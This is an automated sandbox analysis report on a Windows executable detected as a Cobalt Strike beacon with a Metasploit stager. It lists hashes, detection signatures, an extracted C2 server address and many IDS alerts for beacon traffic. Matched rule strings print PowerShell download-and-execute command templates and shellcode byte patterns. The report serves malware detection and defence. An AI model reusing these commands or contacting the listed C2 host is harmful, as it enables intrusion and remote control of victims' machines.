Windows Analysis Report
k2vUsu5VZ5.exe

Overview

General Information

Sample name: k2vUsu5VZ5.exe
renamed because original name is a hash value
Original sample name: 591c92301d93d233f0ab70817db96afd.exe
Analysis ID: 1586891
MD5: 591c92301d93d233f0ab70817db96afd
SHA1: 4294d763f3c0a84235627893f1b377632e7a3ef6
SHA256: 18c3b8d894afcee5e215753507d812be492fec2d7bcde4a9b2c461fa60b63464
Tags: CobaltStrike, exe, user-abuse_ch
Infos:

Detection

CobaltStrike, Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
Yara detected Metasploit Payload
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found potential dummy code loops (likely to delay analysis)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • k2vUsu5VZ5.exe (PID: 7148 cmdline: "C:\Users\user\Desktop\k2vUsu5VZ5.exe" MD5: 591C92301D93D233F0AB70817DB96AFD)
  • cleanup
Name: Cobalt Strike, CobaltStrike
Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"C2Server": "http://7.121.190.121:81/r9dN", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; Touch)\r\n"}
{"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; Touch)\r\n", "Type": "Metasploit Download", "URL": "http://47.121.190.121/r9dN"}
Source | Rule | Description | Author | Strings
00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp | Windows_Trojan_Metasploit_7bc0f998 | Identifies the API address lookup function leverage by metasploit shellcode | unknown
      • 0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
      • 0x7d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike | Yara detected CobaltStrike | Joe Security

Source | Rule | Description | Author | Strings
0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack | JoeSecurity_CobaltStrike | Yara detected CobaltStrike | Joe Security
0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack | Windows_Trojan_CobaltStrike_ee756db7 | Attempts to detect Cobalt Strike based on strings found in BEACON | unknown
            • 0x309a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x30a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x31185:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
            • 0x314b7:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
            • 0x31449:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
            • 0x314b7:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
            • 0x30a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x30c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
            • 0x30ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x30b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
            • 0x31501:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
            • 0x30d6f:$a11: Could not open service control manager on %s: %d
            • 0x312a1:$a12: %d is an x64 process (can't inject x86 content)
            • 0x312d1:$a13: %d is an x86 process (can't inject x64 content)
            • 0x315f2:$a14: Failed to impersonate logged on user %d (%u)
            • 0x3125a:$a15: could not create remote thread in %d: %d
            • 0x30b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x31208:$a17: could not write to process memory: %d
            • 0x30da0:$a18: Could not create service %s on %s: %d
            • 0x30e29:$a19: Could not delete service %s on %s: %d
            • 0x30c89:$a20: Could not open process token: %d (%u)
0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack | Windows_Trojan_CobaltStrike_663fc95d | Identifies CobaltStrike via unidentified function code | unknown
            • 0x1b8f4:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack | Windows_Trojan_CobaltStrike_b54b94ac | Rule for beacon sleep obfuscation routine | unknown
            • 0x4017b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
            No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2025-01-09T18:30:52.958821+010020337131Targeted Malicious Activity was Detected192.168.2.45020447.121.190.12181TCP
            2025-01-09T18:30:54.034038+010020337131Targeted Malicious Activity was Detected192.168.2.45020547.121.190.12181TCP
            2025-01-09T18:30:55.273037+010020337131Targeted Malicious Activity was Detected192.168.2.45020647.121.190.12181TCP
            2025-01-09T18:30:56.360769+010020337131Targeted Malicious Activity was Detected192.168.2.45020747.121.190.12181TCP
            2025-01-09T18:30:57.441619+010020337131Targeted Malicious Activity was Detected192.168.2.45020847.121.190.12181TCP
            2025-01-09T18:30:58.528080+010020337131Targeted Malicious Activity was Detected192.168.2.45020947.121.190.12181TCP
            2025-01-09T18:30:59.657407+010020337131Targeted Malicious Activity was Detected192.168.2.45021047.121.190.12181TCP
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2025-01-09T18:26:57.140796+0100 | 2035442 | 1 | A Network Trojan was detected | 47.121.190.121 | 81 | 192.168.2.4 | 49730 | TCP

            AV Detection

            Source: k2vUsu5VZ5.exe, Avira: detected
            Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: CobaltStrike {"C2Server": "http://7.121.190.121:81/r9dN", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; Touch)\r\n"}
            Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; Touch)\r\n", "Type": "Metasploit Download", "URL": "http://47.121.190.121/r9dN"}
            Source: k2vUsu5VZ5.exe, ReversingLabs: Detection: 78%
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: k2vUsu5VZ5.exe, Joe Sandbox ML: detected
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Code function: 0_2_03881184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_03881184
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Code function: 0_2_038B0020 CryptGenRandom,0_2_038B0020
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Code function: 0_2_0389780C malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_0389780C
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Code function: 0_2_03890F28 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_03890F28

            Networking

            Source: Network traffic, Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49739 -> 47.121.190.121:81
            Source: Network traffic, Suricata IDS: 2035442 - Severity 1 - ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1 : 47.121.190.121:81 -> 192.168.2.4:49730
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49786 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49731 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49757 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49740 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49795 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49830 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49824 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49818 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49837 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49760 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49770 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49767 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49807 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49841 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49787 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49765 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49849 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49873 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49782 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49771 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49893 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49863 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49886 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49909 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49741 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49902 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49932 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49783 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49856 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49764 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49879 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49916 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49738 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49781 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49955 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49963 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49971 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49939 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49978 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49755 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49988 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49768 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49926 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49772 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49996 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49773 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50005 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50012 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50020 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50028 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50042 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49948 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50035 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50060 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50051 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50068 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50076 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50095 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50094 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50097 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50101 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50103 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50102 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50100 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50105 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50115 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50083 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50112 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50119 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50118 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50110 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50107 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50113 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50136 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50106 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50138 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50093 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50125 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50120 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50150 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50134 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50155 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50139 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50121 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50160 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50159 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50098 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50162 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50149 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50173 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50156 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50183 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50128 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50166 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50124 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50099 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50193 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50175 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50194 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50154 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50143 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50181 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50109 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50202 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50114 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50129 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50144 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50164 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50171 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50185 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50187 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50172 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50203 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50190 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50146 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50131 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50191 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50189 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50201 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50199 -> 47.121.190.121:81
